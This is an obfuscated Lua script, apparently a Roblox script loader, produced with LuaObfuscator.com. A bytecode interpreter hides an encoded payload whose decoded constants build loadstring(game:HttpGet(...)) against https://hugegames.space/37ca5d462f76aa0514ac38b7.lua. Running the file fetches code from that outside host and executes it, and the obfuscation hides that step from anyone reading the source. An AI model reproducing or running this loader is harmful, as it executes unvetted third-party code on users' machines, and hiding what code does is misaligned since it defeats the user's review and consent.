--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23() local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * 256) + v32 ;end v18=3;end if (v18==4) then function v25() local v34=v24();local v35=v24();local v36=1 -0 ;local v37=(v21(v35,(352 -(87 + 263)) -(181 -(67 + 113)) ,639 -(555 + 64) ) * ((933 -(857 + 74))^((440 + 160) -(367 + 201)))) + v34 ;local v38=v21(v35,948 -((395 -181) + 713) ,8 + (56 -33) );local v39=((v21(v35,6 + 26 )==(878 -(282 + 595))) and  -(1638 -(1121 + 402 + 114))) or (1 + 0) ;if (v38==0) then if (v37==(0 -0)) then return v39 * (1065 -(68 + 997)) ;else v38=1271 -(226 + 1044) ;v36=0 -0 ;end elseif (v38==((3972 -1808) -(32 + 85))) then return ((v37==0) and (v39 * ((1 + 0)/(0 + 0)))) or (v39 * NaN) ;end return v8(v39,v38-(1980 -(892 + 65)) ) * (v36 + (v37/(2^(123 -71)))) ;end v26=nil;function v26(v40) local v41;if  not v40 then v40=v24();if (v40==(0 -0)) then return "";end end v41=v3(v16,v19,(v19 + v40) -1 );v19=v19 + v40 ;local v42={};for v67=953 -(802 + 150) , #v41 do v42[v67]=v2(v1(v3(v41,v67,v67)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v43~=(1171 -(418 + 753))) then else v44=0;v45=nil;v43=1;end if (v43==(1 + 0)) then v46=nil;v47=nil;v43=1 + 1 ;end if (v43==4) then v52=nil;while true do if (v44==(1 + 2)) then v51=nil;v52=nil;v44=4;end if (0==v44) then local v97=0;while true do if (1~=v97) then else v44=1;break;end if (v97==0) then v45=0;v46=nil;v97=1 + 0 ;end end end if (v44==(530 -(406 + 123))) then local v98=0;while true do if (v98==1) then v44=1771 -(1749 + 20) ;break;end if (v98==0) then v47=nil;v48=nil;v98=1 + 0 ;end end end if (v44~=2) then else v49=nil;v50=nil;v44=1325 -(1249 + 73) ;end if (v44==(2 + 2)) then while true do if (v45==(1148 -(466 + 679))) then v52=nil;while true do local v101=0;local v102;local v103;while true do if (v101==(2 -1)) then while true do if (v102==0) then v103=0;while true do if (v103==1) then if ((0 -0)~=v46) then else local v146=0;local v147;while true do if (0~=v146) then else v147=0;while true do if (v147~=2) then else v46=1901 -(106 + 1794) ;break;end if (v147~=(1 + 0)) then else local v148=0 + 0 ;while true do if (v148~=(0 -0)) then else local v155=0 -0 ;while true do if (v155==(114 -(4 + 110))) then v49={};v50={v47,v48,nil,v49};v155=1 + 0 ;end if (v155==1) then v148=1 -0 ;break;end end end if (v148==1) then v147=5 -3 ;break;end end end if (v147~=0) then else local v149=0;while true do if (v149==1) then v147=1;break;end if (v149==(166 -(122 + 44))) then v47={};v48={};v149=1 -0 ;end end end end break;end end end break;end if (v103==0) then local v144=0 -0 ;local v145;while true do if (v144==0) then v145=0 + 0 ;while true do if (0~=v145) then else if (v46==(1 + 1)) then local v150=0 -0 ;local v151;local v152;while true do if (v150~=(66 -(30 + 35))) then else while true do if (v151==(0 + 0)) then v152=0;while true do if ((1257 -(1043 + 214))==v152) then for v159=3 -2 ,v24() do local v160=1212 -(323 + 889) ;local v161;local v162;while true do if (v160==(2 -1)) then while true do if (v161==0) then v162=v22();if (v21(v162,581 -(361 + 219) ,321 -(53 + 267) )==0) then local v171=0 + 0 ;local v172;local v173;local v174;local v175;local v176;while true do if (0~=v171) then else v172=413 -(15 + 398) ;v173=nil;v171=983 -(18 + 964) ;end if (v171==(3 -2)) then v174=nil;v175=nil;v171=2 + 0 ;end if (v171==(2 + 0)) then v176=nil;while true do if (v172~=(851 -(20 + 830))) then else local v179=0 + 0 ;while true do if (v179~=(126 -(116 + 10))) then else v175=nil;v176=nil;v179=1 + 0 ;end if (v179==1) then v172=740 -(542 + 196) ;break;end end end if (v172==(3 -1)) then while true do if ((0 + 0)==v173) then local v182=0;while true do if (v182==(1 + 0)) then v173=1 + 0 ;break;end if (v182~=0) then else local v189=0 -0 ;while true do if (v189~=(2 -1)) then else v182=1;break;end if (v189==0) then v174=v21(v162,2,1554 -(1126 + 425) );v175=v21(v162,4,411 -(118 + 287) );v189=1;end end end end end if (2~=v173) then else local v183=0;local v184;while true do if (v183==0) then v184=0 -0 ;while true do if (v184==(1121 -(118 + 1003))) then local v192=0;local v193;while true do if (v192~=0) then else v193=0;while true do if (v193==0) then local v197=0;while true do if (v197==1) then v193=2 -1 ;break;end if (v197==0) then if (v21(v175,1,1)==1) then v176[2]=v52[v176[2]];end if (v21(v175,379 -(142 + 235) ,2)~=1) then else v176[13 -10 ]=v52[v176[1 + 2 ]];end v197=978 -(553 + 424) ;end end end if (v193==1) then v184=1;break;end end break;end end end if (v184==1) then v173=3;break;end end break;end end end if (v173==3) then if (v21(v175,5 -2 ,3)==(1 + 0)) then v176[4 + 0 ]=v52[v176[3 + 1 ]];end v47[v159]=v176;break;end if (v173==(1 + 0)) then local v186=0 + 0 ;while true do if ((0 -0)~=v186) then else local v190=0 -0 ;while true do if (v190==(0 -0)) then local v194=0 + 0 ;while true do if ((0 -0)==v194) then v176={v23(),v23(),nil,nil};if (v174==(753 -(239 + 514))) then local v195=0 + 0 ;local v196;while true do if (v195==0) then v196=1329 -(797 + 532) ;while true do if (v196~=0) then else v176[3]=v23();v176[3 + 1 ]=v23();break;end end break;end end elseif (v174==1) then v176[2 + 1 ]=v24();elseif (v174==(4 -2)) then v176[3]=v24() -((1204 -(373 + 829))^16) ;elseif (v174~=3) then else local v206=731 -(476 + 255) ;local v207;local v208;while true do if (v206==1) then while true do if (v207~=0) then else v208=0;while true do if (v208==0) then v176[3]=v24() -(2^16) ;v176[1134 -(369 + 761) ]=v23();break;end end break;end end break;end if (v206==0) then v207=0;v208=nil;v206=1;end end end v194=1 + 0 ;end if (v194==1) then v190=1;break;end end end if (v190==(1 -0)) then v186=1;break;end end end if (v186==(1 -0)) then v173=240 -(64 + 174) ;break;end end end end break;end if (v172==(0 + 0)) then local v180=0 -0 ;local v181;while true do if (v180==0) then v181=0;while true do if (0==v181) then local v191=0;while true do if (v191~=0) then else v173=0;v174=nil;v191=337 -(144 + 192) ;end if (v191~=1) then else v181=1;break;end end end if (v181==(217 -(42 + 174))) then v172=1;break;end end break;end end end end break;end end end break;end end break;end if (v160==0) then v161=0 + 0 ;v162=nil;v160=1 + 0 ;end end end for v163=1,v24() do v48[v163-1 ]=v29();end v152=1;end if (v152==1) then return v50;end end break;end end break;end if ((0 + 0)~=v150) then else v151=1504 -(363 + 1141) ;v152=nil;v150=1581 -(1183 + 397) ;end end end if ((2 -1)==v46) then local v153=0 + 0 ;local v154;while true do if ((0 + 0)==v153) then v154=0;while true do if (v154==(1976 -(1913 + 62))) then local v156=0 + 0 ;while true do if (v156==0) then local v158=0;while true do if (v158~=0) then else for v166=2 -1 ,v51 do local v167=0;local v168;local v169;local v170;while true do if (v167==(1934 -(565 + 1368))) then v170=nil;while true do if (v168==(3 -2)) then if (v169==(1662 -(1477 + 184))) then v170=v22()~=0 ;elseif (v169==2) then v170=v25();elseif (v169~=(3 -0)) then else v170=v26();end v52[v166]=v170;break;end if (v168==(0 + 0)) then local v178=856 -(564 + 292) ;while true do if (v178==1) then v168=1;break;end if (v178~=0) then else v169=v22();v170=nil;v178=1;end end end end break;end if (v167~=(0 -0)) then else v168=0;v169=nil;v167=1;end end end v50[8 -5 ]=v22();v158=305 -(244 + 60) ;end if (v158==(1 + 0)) then v156=477 -(41 + 435) ;break;end end end if (v156~=(1002 -(938 + 63))) then else v154=2;break;end end end if (v154==(0 + 0)) then local v157=0;while true do if (v157==1) then v154=1;break;end if (v157~=(1125 -(936 + 189))) then else v51=v24();v52={};v157=1;end end end if (v154~=2) then else v46=2;break;end end break;end end end v145=1 + 0 ;end if ((1614 -(1565 + 48))~=v145) then else v103=1 + 0 ;break;end end break;end end end end break;end end break;end if (v101~=0) then else v102=0;v103=nil;v101=1139 -(782 + 356) ;end end end break;end if (v45==2) then local v99=267 -(176 + 91) ;while true do if ((0 -0)==v99) then v50=nil;v51=nil;v99=1 -0 ;end if (v99~=(1093 -(975 + 117))) then else v45=1878 -(157 + 1718) ;break;end end end if (v45~=(0 + 0)) then else local v100=0;while true do if (v100==1) then v45=1;break;end if ((0 -0)~=v100) then else local v134=0;while true do if (v134==0) then v46=0 -0 ;v47=nil;v134=1019 -(697 + 321) ;end if (v134==(2 -1)) then v100=1 -0 ;break;end end end end end if (v45==(2 -1)) then v48=nil;v49=nil;v45=1 + 1 ;end end break;end end break;end if (v43==2) then v48=nil;v49=nil;v43=5 -2 ;end if ((7 -4)==v43) then v50=nil;v51=nil;v43=1231 -(322 + 905) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53) if (v1(v53,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v53,1,1));return "";end end else local v84=v2(v0(v53,16));if v20 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v84,v20);v20=nil;v89=1;end end else return v84;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v54,v55,v56,v57=v1(v16,v19,v19 + ((198 + 416) -(602 + 9)) );v19=v19 + (1193 -((2347 -(260 + 1638)) + 740)) ;return (v57 * (16778088 -(826 + 46))) + (v56 * (66483 -(245 + 702))) + (v55 * (808 -552)) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60) local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...) local v69=v61;local v70=v62;local v71=v63;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v85=0,v77 do if (v85>=v71) then v75[v85-v71 ]=v76[v85 + 1 ];else v79[v85]=v76[v85 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v86=0;while true do if (v86==0) then v81=v69[v73];v82=v81[1];v86=1;end if (v86==1) then if (v82<=3) then if (v82<=1) then if (v82==0) then do return;end else local v104=0;local v105;while true do if (v104==0) then v105=v81[2];v79[v105]=v79[v105](v13(v79,v105 + 1 ,v74));break;end end end elseif (v82>2) then local v106;local v107,v108;local v109;local v110;v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v110=v81[2];v109=v79[v81[3]];v79[v110 + 1 ]=v109;v79[v110]=v109[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v110=v81[2];v107,v108=v72(v79[v110](v13(v79,v110 + 1 ,v81[3])));v74=(v108 + v110) -1 ;v106=0;for v135=v110,v74 do v106=v106 + 1 ;v79[v135]=v107[v106];end v73=v73 + 1 ;v81=v69[v73];v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end else local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];end elseif (v82<=5) then if (v82==4) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==2) then for v141=v126,v74 do v129=v129 + 1 ;v79[v141]=v127[v129];end break;end if (v125==1) then v74=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v81[2];v127,v128=v72(v79[v126](v13(v79,v126 + 1 ,v81[3])));v125=1;end end else v79[v81[2]]();end elseif (v82>6) then v79[v81[2]]=v60[v81[3]];else v79[v81[2]]=v81[3];end v73=v73 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66) if v66 then local v87=(v64/(2^(v65-1)))%((442 -(382 + 5 + 53))^(((v66-(3 -2)) -(v65-1)) + 1 + 0)) ;return v87-(v87%(1 -0)) ;else local v88=(5 -3)^(v65-((2896 -(1121 + 569)) -(902 + 303))) ;return (((v64%(v88 + v88))>=v88) and (1 -0)) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F3337636135643436326637362O61303531346163333862372E6C756100083O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
